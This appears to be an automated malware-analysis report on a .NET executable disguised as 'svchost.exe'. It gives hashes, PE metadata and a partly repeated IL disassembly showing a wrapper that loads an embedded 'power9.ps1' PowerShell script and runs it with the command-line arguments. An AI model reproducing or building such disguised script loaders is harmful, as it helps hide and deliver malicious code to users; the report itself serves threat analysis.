8fb788ba54fadf27b7597680b2d7ac6d
PE Executable | MD5: 8fb788ba54fadf27b7597680b2d7ac6d | Size: 49.16 KB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 8fb788ba54fadf27b7597680b2d7ac6d
|
| Sha1 | 9c5d30ca6cf3bf05fc7361db526414da6ba30e33
|
| Sha256 | 4633c634b164c6cdd256415ae8a4ffecfd9a293d3d9cbe6ac6510da15034b375
|
| Sha384 | bb50b70a9b4039b8c36e455ac5e73b298451fcf43abf095b2923351ad07314a4772197d74444cf8b8e27d8a537983c26
|
| Sha512 | 42e3a4400dfc8e9c1586e7b2a5798507f43a472dddc415cb30abd7d4af49c15b0e497926ae10f82daa4ed72c9007485e4f31a7172cf5dc05f6c35247b67fd8ed
|
| SSDeep | 384:GxysR3YvG1Ce83ggIMM/06WUz214dHRjQxqmlTW4gCwL1gb+PiGkxiEVjn:GwYdgwWedHdi3Iv1gbJ4EJ
|
| TLSH | 3A2319187698C52DD23E4B7DA4A21A104677A33F121BEBC57CCC48AD2FB372845317AB
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader FAIL, AsmResolver Mapped OK |
| Info | Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_438a2ed1.exe |
| Module Name | svchost.exe |
| Full Name | svchost.exe |
| EntryPoint | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Scope Name | svchost.exe |
| Scope Type | ModuleDef |
| Kind | Console |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | svchost |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 76 |
| Main Method | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Main IL Instruction Count | 568 |
| Main IL | ldnull <null> stloc.s V_26 ldnull <null> stloc.s V_27 ldnull <null> stloc.s V_28 newobj System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::.ctor() stloc.s V_29 newobj System.Void ModuleNameSpace.MainApp::.ctor() stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldsfld System.String System.String::Empty stloc.2 <null> ldloc.s V_29 newobj System.Void ModuleNameSpace.MainModuleUI::.ctor() stfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui ldloc.0 <null> ldloc.s V_29 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui newobj System.Void ModuleNameSpace.MainModule::.ctor(ModuleNameSpace.MainAppInterface,ModuleNameSpace.MainModuleUI) stloc.3 <null> ldloc.s V_29 ldc.i4.0 <null> newobj System.Void System.Threading.ManualResetEvent::.ctor(System.Boolean) stfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass8::mre call System.AppDomain System.AppDomain::get_CurrentDomain() ldnull <null> ldftn System.Void ModuleNameSpace.MainApp::CurrentDomain_UnhandledException(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) ldloc.3 <null> call System.Management.Automation.Runspaces.Runspace System.Management.Automation.Runspaces.RunspaceFactory::CreateRunspace(System.Management.Automation.Host.PSHost) stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> callvirt System.Void System.Management.Automation.Runspaces.Runspace::set_ApartmentState(System.Threading.ApartmentState) ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Open() ldnull <null> stloc.s V_23 newobj System.Void ModuleNameSpace.MainApp/<>c__DisplayClassb::.ctor() stloc.s V_24 ldloc.s V_24 ldloc.s V_29 stfld ModuleNameSpace.MainApp/<>c__DisplayClass8 ModuleNameSpace.MainApp/<>c__DisplayClassb::CS$<>8__locals9 ldloc.s V_24 call System.Management.Automation.PowerShell System.Management.Automation.PowerShell::Create() stfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_23 brtrue.s IL_00A4: ldloc.s V_23 ldloc.s V_24 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClassb::<Main>b__0(System.Object,System.ConsoleCancelEventArgs) newobj System.Void System.ConsoleCancelEventHandler::.ctor(System.Object,System.IntPtr) stloc.s V_23 ldloc.s V_23 call System.Void System.Console::add_CancelKeyPress(System.ConsoleCancelEventHandler) ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_4 callvirt System.Void System.Management.Automation.PowerShell::set_Runspace(System.Management.Automation.Runspaces.Runspace) ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Management.Automation.PSDataStreams System.Management.Automation.PowerShell::get_Streams() callvirt System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord> System.Management.Automation.PSDataStreams::get_Error() ldloc.s V_26 brtrue.s IL_00DD: ldloc.s V_26 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__2(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_26 ldloc.s V_26 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) newobj System.Void System.Management.Automation.PSDataCollection`1<System.String>::.ctor() stloc.s V_5 call System.Boolean System.Console::get_IsInputRedirected() brfalse.s IL_010E: ldloc.s V_5 ldstr stloc.s V_6 br.s IL_0104: call System.String System.Console::ReadLine() ldloc.s V_5 ldloc.s V_6 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Add(System.String) call System.String System.Console::ReadLine() dup <null> stloc.s V_6 brtrue.s IL_00FB: ldloc.s V_5 ldloc.s V_5 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Complete() newobj System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::.ctor() stloc.s V_7 ldloc.s V_7 ldloc.s V_27 brtrue.s IL_0131: ldloc.s V_27 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__3(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_27 ldloc.s V_27 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) ldc.i4.0 <null> stloc.s V_8 ldc.i4.0 <null> stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 ldstr stloc.s V_11 ldarg.0 <null> stloc.s V_31 ldc.i4.0 <null> stloc.s V_32 br IL_0257: ldloc.s V_32 ldloc.s V_31 ldloc.s V_32 ldelem.ref <null> stloc.s V_12 ldloc.s V_12 ldstr -wait ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_0170: ldloc.s V_12 ldc.i4.1 <null> stloc.1 <null> br IL_024B: ldloc.s V_9 ldloc.s V_12 ldstr -extract ldc.i4.3 <null> callvirt System.Boolean System.String::StartsWith(System.String,System.StringComparison) brfalse.s IL_01D2: ldloc.s V_12 ldloc.s V_12 ldc.i4.1 <null> newarr System.String stloc.s V_33 ldloc.s V_33 ldc.i4.0 <null> ldstr : stelem.ref <null> ldloc.s V_33 ldc.i4.2 <null> ldc.i4.1 <null> callvirt System.String[] System.String::Split(System.String[],System.Int32,System.StringSplitOptions) stloc.s V_13 ldloc.s V_13 ldlen <null> conv.i4 <null> ldc.i4.2 <null> beq.s IL_01B6: ldloc.s V_13 ldstr If you specify the -extract option you need to add a file for extraction in this way -extract:"<filename>" call System.Void System.Console::WriteLine(System.String) ldc.i4.1 <null> stloc.s V_30 leave IL_065A: ldloc.s V_30 ldloc.s V_13 ldc.i4.1 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_34 ldloc.s V_34 ldc.i4.0 <null> ldc.i4.s 34 stelem.i2 <null> ldloc.s V_34 callvirt System.String System.String::Trim(System.Char[]) stloc.2 <null> br.s IL_024B: ldloc.s V_9 ldloc.s V_12 ldstr -end ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01E9: ldloc.s V_12 ldloc.s V_9 ldc.i4.1 <null> add <null> stloc.s V_8 br.s IL_0262: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_12 ldstr -? ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01FD: ldloc.s V_10 ldc.i4.1 <null> stloc.s V_10 br.s IL_024B: ldloc.s V_9 ldloc.s V_10 brfalse.s IL_0234: ldloc.s V_12 ldloc.s V_12 ldstr -detailed ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_022E: ldloc.s V_12 ldloc.s V_12 ldstr -examples ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_022E: ldloc.s V_12 ldloc.s V_12 ldstr -full ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_024B: ldloc.s V_9 ldloc.s V_12 stloc.s V_11 br.s IL_024B: ldloc.s V_9 ldloc.s V_12 ldstr -debug ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_024B: ldloc.s V_9 call System.Boolean System.Diagnostics.Debugger::Launch() pop <null> br.s IL_0262: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_9 ldc.i4.1 <null> add <null> stloc.s V_9 ldloc.s V_32 ldc.i4.1 <null> add <null> stloc.s V_32 ldloc.s V_32 ldloc.s V_31 ldlen <null> conv.i4 <null> blt IL_0153: ldloc.s V_31 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_14 ldloc.s V_14 ldstr power9.ps1 callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_15 ldloc.s V_15 call System.Text.Encoding System.Text.Encoding::get_UTF8() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream,System.Text.Encoding) stloc.s V_16 ldloc.s V_16 callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_17 ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_02A6: ldloc.s V_10 ldloc.2 <null> ldloc.s V_17 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldc.i4.0 <null> stloc.s V_30 leave IL_065A: ldloc.s V_30 ldloc.s V_10 brfalse.s IL_031E: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldc.i4.s 9 newarr System.String stloc.s V_35 ldloc.s V_35 ldc.i4.0 <null> ldstr function stelem.ref <null> ldloc.s V_35 ldc.i4.1 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_35 ldc.i4.2 <null> ldstr { stelem.ref <null> ldloc.s V_35 ldc.i4.3 <null> ldloc.s V_17 stelem.ref <null> ldloc.s V_35 ldc.i4.4 <null> ldstr }; Get-Help stelem.ref <null> ldloc.s V_35 ldc.i4.5 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_35 ldc.i4.6 <null> ldstr stelem.ref <null> ldloc.s V_35 ldc.i4.7 <null> ldloc.s V_11 stelem.ref <null> ldloc.s V_35 ldc.i4.8 <null> ldstr | Out-String stelem.ref <null> ldloc.s V_35 call System.String System.String::Concat(System.String[]) callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop <null> br.s IL_032D: leave.s IL_033B ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_17 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop <null> leave.s IL_033B: leave.s IL_0349 ldloc.s V_16 brfalse.s IL_033A: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0349: ldloc.s V_10 ldloc.s V_15 brfalse.s IL_0348: endfinally ldloc.s V_15 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_10 brtrue IL_0575: ldloc.s V_24 ldnull <null> stloc.s V_18 ldstr ^-([^: ]+)[ :]?([^:]*)$ newobj System.Void System.Text.RegularExpressions.Regex::.ctor(System.String) stloc.s V_19 ldloc.s V_8 stloc.s V_20 br IL_0534: ldloc.s V_20 ldloc.s V_19 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Text.RegularExpressions.Match System.Text.RegularExpressions.Regex::Match(System.String) stloc.s V_21 ldloc.s V_21 callvirt System.Boolean System.Text.RegularExpressions.Group::get_Success() brfalse IL_0501: ldloc.s V_18 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() callvirt System.Int32 System.Text.RegularExpressions.GroupCollection::get_Count() ldc.i4.3 <null> bne.un IL_0501: ldloc.s V_18 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> ldloca.s V_22 call System.Boolean System.Double::TryParse(System.String,System.Double&) brtrue IL_0501: ldloc.s V_18 ldloc.s V_18 brfalse.s IL_03B6: ldloc.s V_21 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::Trim() ldstr call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_03F2: ldloc.s V_21 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() stloc.s V_18 br IL_052E: ldloc.s V_20 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0433: ldloc.s V_24 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $TRUE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0460: ldloc.s V_21 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.1 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br IL_052E: ldloc.s V_20 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_04A1: ldloc.s V_24 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $FALSE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_04CB: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.0 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_18 brfalse.s IL_051D: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddArgument(System.Object) pop <null> ldloc.s V_20 ldc.i4.1 <null> add <null> stloc.s V_20 ldloc.s V_20 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_0368: ldloc.s V_19 ldloc.s V_18 brfalse.s IL_0551: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldstr Out-String callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddCommand(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldstr Stream callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_5 ldloc.s V_7 ldnull <null> ldloc.s V_28 brtrue.s IL_0594: ldloc.s V_28 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__4(System.IAsyncResult) newobj System.Void System.AsyncCallback::.ctor(System.Object,System.IntPtr) stloc.s V_28 ldloc.s V_28 ldnull <null> callvirt System.IAsyncResult System.Management.Automation.PowerShell::BeginInvoke<System.String,System.Management.Automation.PSObject>(System.Management.Automation.PSDataCollection`1<System.String>,System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>,System.Management.Automation.PSInvocationSettings,System.AsyncCallback,System.Object) pop <null> ldloc.0 <null> callvirt System.Boolean ModuleNameSpace.MainApp::get_ShouldExit() brtrue.s IL_05B5: ldloc.s V_24 ldloc.s V_29 ldfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass8::mre ldc.i4.s 100 callvirt System.Boolean System.Threading.WaitHandle::WaitOne(System.Int32) brfalse.s IL_059D: ldloc.0 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Void System.Management.Automation.PowerShell::Stop() ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Management.Automation.PSInvocationState System.Management.Automation.PSInvocationStateInfo::get_State() ldc.i4.5 <null> bne.un.s IL_05F7: leave.s IL_060F ldloc.s V_29 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Exception System.Management.Automation.PSInvocationStateInfo::get_Reason() callvirt System.String System.Exception::get_Message() callvirt System.Void System.Management.Automation.Host.PSHostUserInterface::WriteErrorLine(System.String) leave.s IL_060F: ldloc.s V_4 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh brfalse.s IL_060E: endfinally ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Close() leave.s IL_0624: leave.s IL_0640 ldloc.s V_4 brfalse.s IL_0623: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0640: ldloc.1 stloc.s V_25 ldstr An exception occured: call System.Void System.Console::Write(System.String) ldloc.s V_25 callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String) leave.s IL_0640: ldloc.1 ldloc.1 <null> brfalse.s IL_0653: ldloc.0 ldstr Hit any key to exit... call System.Void System.Console::WriteLine(System.String) call System.ConsoleKeyInfo System.Console::ReadKey() pop <null> ldloc.0 <null> callvirt System.Int32 ModuleNameSpace.MainApp::get_ExitCode() ret <null> ldloc.s V_30 ret <null> |
| Module Name | svchost.exe |
| Full Name | svchost.exe |
| EntryPoint | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Scope Name | svchost.exe |
| Scope Type | ModuleDef |
| Kind | Console |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | svchost |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 76 |
| Main Method | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Main IL Instruction Count | 568 |
| Main IL | ldnull <null> stloc.s V_26 ldnull <null> stloc.s V_27 ldnull <null> stloc.s V_28 newobj System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::.ctor() stloc.s V_29 newobj System.Void ModuleNameSpace.MainApp::.ctor() stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldsfld System.String System.String::Empty stloc.2 <null> ldloc.s V_29 newobj System.Void ModuleNameSpace.MainModuleUI::.ctor() stfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui ldloc.0 <null> ldloc.s V_29 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui newobj System.Void ModuleNameSpace.MainModule::.ctor(ModuleNameSpace.MainAppInterface,ModuleNameSpace.MainModuleUI) stloc.3 <null> ldloc.s V_29 ldc.i4.0 <null> newobj System.Void System.Threading.ManualResetEvent::.ctor(System.Boolean) stfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass8::mre call System.AppDomain System.AppDomain::get_CurrentDomain() ldnull <null> ldftn System.Void ModuleNameSpace.MainApp::CurrentDomain_UnhandledException(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) ldloc.3 <null> call System.Management.Automation.Runspaces.Runspace System.Management.Automation.Runspaces.RunspaceFactory::CreateRunspace(System.Management.Automation.Host.PSHost) stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> callvirt System.Void System.Management.Automation.Runspaces.Runspace::set_ApartmentState(System.Threading.ApartmentState) ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Open() ldnull <null> stloc.s V_23 newobj System.Void ModuleNameSpace.MainApp/<>c__DisplayClassb::.ctor() stloc.s V_24 ldloc.s V_24 ldloc.s V_29 stfld ModuleNameSpace.MainApp/<>c__DisplayClass8 ModuleNameSpace.MainApp/<>c__DisplayClassb::CS$<>8__locals9 ldloc.s V_24 call System.Management.Automation.PowerShell System.Management.Automation.PowerShell::Create() stfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_23 brtrue.s IL_00A4: ldloc.s V_23 ldloc.s V_24 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClassb::<Main>b__0(System.Object,System.ConsoleCancelEventArgs) newobj System.Void System.ConsoleCancelEventHandler::.ctor(System.Object,System.IntPtr) stloc.s V_23 ldloc.s V_23 call System.Void System.Console::add_CancelKeyPress(System.ConsoleCancelEventHandler) ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_4 callvirt System.Void System.Management.Automation.PowerShell::set_Runspace(System.Management.Automation.Runspaces.Runspace) ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Management.Automation.PSDataStreams System.Management.Automation.PowerShell::get_Streams() callvirt System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord> System.Management.Automation.PSDataStreams::get_Error() ldloc.s V_26 brtrue.s IL_00DD: ldloc.s V_26 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__2(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_26 ldloc.s V_26 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) newobj System.Void System.Management.Automation.PSDataCollection`1<System.String>::.ctor() stloc.s V_5 call System.Boolean System.Console::get_IsInputRedirected() brfalse.s IL_010E: ldloc.s V_5 ldstr stloc.s V_6 br.s IL_0104: call System.String System.Console::ReadLine() ldloc.s V_5 ldloc.s V_6 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Add(System.String) call System.String System.Console::ReadLine() dup <null> stloc.s V_6 brtrue.s IL_00FB: ldloc.s V_5 ldloc.s V_5 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Complete() newobj System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::.ctor() stloc.s V_7 ldloc.s V_7 ldloc.s V_27 brtrue.s IL_0131: ldloc.s V_27 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__3(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_27 ldloc.s V_27 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) ldc.i4.0 <null> stloc.s V_8 ldc.i4.0 <null> stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 ldstr stloc.s V_11 ldarg.0 <null> stloc.s V_31 ldc.i4.0 <null> stloc.s V_32 br IL_0257: ldloc.s V_32 ldloc.s V_31 ldloc.s V_32 ldelem.ref <null> stloc.s V_12 ldloc.s V_12 ldstr -wait ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_0170: ldloc.s V_12 